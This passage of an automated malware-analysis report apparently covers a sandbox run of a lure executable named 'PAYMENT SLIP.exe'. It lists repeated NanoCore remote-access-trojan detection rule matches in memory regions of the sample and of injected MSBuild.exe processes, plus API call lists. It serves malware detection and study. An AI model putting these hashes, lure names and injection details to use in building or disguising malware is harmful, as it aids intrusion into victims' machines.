        Source: 8.2.hmhrpib.exe.2f30000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 8.2.hmhrpib.exe.2f30000.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.2.MSBuild.exe.48632ce.24.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 8.2.hmhrpib.exe.2f30000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 8.2.hmhrpib.exe.2f30000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 22.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 19.2.MSBuild.exe.40feae4.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.17a0000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.17e0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.4507ac8.19.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.3530f30.17.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.61a0000.33.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.MSBuild.exe.3f59cae.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.MSBuild.exe.3f59cae.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.2.MSBuild.exe.46574b4.21.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.1810000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 19.2.MSBuild.exe.40f9cae.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 19.2.MSBuild.exe.40f9cae.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.2.MSBuild.exe.3530f30.17.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.3530f30.17.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 22.2.MSBuild.exe.3f6310d.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.1870000.14.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.MSBuild.exe.3f5eae4.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.17c0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.61a4629.32.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.3545564.16.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.3545564.16.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.2.MSBuild.exe.17d0000.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.1430000.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.3524cf0.18.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.3524cf0.18.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.2.MSBuild.exe.466a56f.23.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.61a0000.33.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 1.2.PAYMENT SLIP.exe.2400000.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 1.2.PAYMENT SLIP.exe.2400000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 19.2.MSBuild.exe.410310d.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.46658d0.22.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.17a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.1844c9f.11.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 13.2.hmhrpib.exe.2f30000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 13.2.hmhrpib.exe.2f30000.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 19.2.MSBuild.exe.30d3c74.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Executable has a suspicious name (potential lure to open the executable)Show sources
        Source: PAYMENT SLIP.exeStatic file information: Suspicious name
        Initial sample is a PE file and has a suspicious nameShow sources
        Source: initial sampleStatic PE information: Filename: PAYMENT SLIP.exe
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 12_2_057D152A NtQuerySystemInformation,12_2_057D152A
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 12_2_057D14EF NtQuerySystemInformation,12_2_057D14EF
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeCode function: 1_2_004035D8 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_004035D8
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exeCode function: 8_2_004035D8 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,8_2_004035D8
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeCode function: 1_2_00406C5B1_2_00406C5B
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exeCode function: 8_2_00406C5B8_2_00406C5B
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 12_2_056A385012_2_056A3850
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 12_2_056AAF7812_2_056AAF78
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 12_2_056A2FA812_2_056A2FA8
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 12_2_056A23A012_2_056A23A0
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 12_2_056A86A812_2_056A86A8
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 12_2_056A92A812_2_056A92A8
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 12_2_056A306F12_2_056A306F
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 12_2_056A936F12_2_056A936F
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 12_2_056A9B5012_2_056A9B50
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 12_2_06CD2E7812_2_06CD2E78
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 12_2_06CD227812_2_06CD2278
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 12_2_06CD2F3F12_2_06CD2F3F
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 17_2_00E5247717_2_00E52477
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 17_2_0504070817_2_05040708
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 19_2_02D223A019_2_02D223A0
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 19_2_02D22FA819_2_02D22FA8
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 19_2_02D2385019_2_02D23850
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 19_2_02D232BB19_2_02D232BB
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 19_2_02D2306F19_2_02D2306F
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 22_2_050D385022_2_050D3850
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 22_2_050D2FA822_2_050D2FA8
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 22_2_050D23A022_2_050D23A0
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 22_2_050D306F22_2_050D306F
        Source: PAYMENT SLIP.exe, 00000001.00000003.656783504.00000000034BF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PAYMENT SLIP.exe
        Source: PAYMENT SLIP.exe, 00000006.00000003.682815519.000000000344F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PAYMENT SLIP.exe
        Source: PAYMENT SLIP.exe, 0000000A.00000003.708126945.0000000003246000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PAYMENT SLIP.exe
        Source: PAYMENT SLIP.exe, 00000014.00000003.740614200.00000000031E6000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PAYMENT SLIP.exe
        Source: PAYMENT SLIP.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        Source: 00000008.00000002.706739434.0000000002F30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000008.00000002.706739434.0000000002F30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000008.00000002.706739434.0000000002F30000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000D.00000002.732908055.0000000002F30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000D.00000002.732908055.0000000002F30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000D.00000002.732908055.0000000002F30000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000A.00000002.723894048.00000000024E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000A.00000002.723894048.00000000024E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000A.00000002.723894048.00000000024E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000002.910500149.0000000001830000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000002.910500149.0000000001830000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000C.00000002.909856080.0000000001450000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000002.909856080.0000000001450000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000C.00000002.910512551.0000000001840000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000002.910512551.0000000001840000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000001.00000002.665787151.0000000002400000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000001.00000002.665787151.0000000002400000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000001.00000002.665787151.0000000002400000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000002.909818098.0000000001420000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000002.909818098.0000000001420000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000C.00000002.910417181.00000000017D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000002.910417181.00000000017D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000C.00000002.914312313.00000000061A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000002.914312313.00000000061A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000013.00000002.745550001.00000000040B1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000002.910472948.0000000001810000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000002.910472948.0000000001810000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000016.00000002.762297835.0000000002F11000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000006.00000002.693808017.0000000003160000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000006.00000002.693808017.0000000003160000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000006.00000002.693808017.0000000003160000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000002.909835016.0000000001430000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000002.909835016.0000000001430000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000C.00000002.911646592.000000000485A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000002.910378079.00000000017A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000002.910378079.00000000017A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000C.00000002.910442224.00000000017F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000002.910442224.00000000017F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000016.00000002.762317389.0000000003F11000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000002.910984817.00000000034F4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000016.00000002.753927401.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000016.00000002.753927401.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000002.910406423.00000000017C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000002.910406423.00000000017C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000C.00000002.910536260.0000000001870000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000002.910536260.0000000001870000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000014.00000002.745571478.0000000003050000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000014.00000002.745571478.0000000003050000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
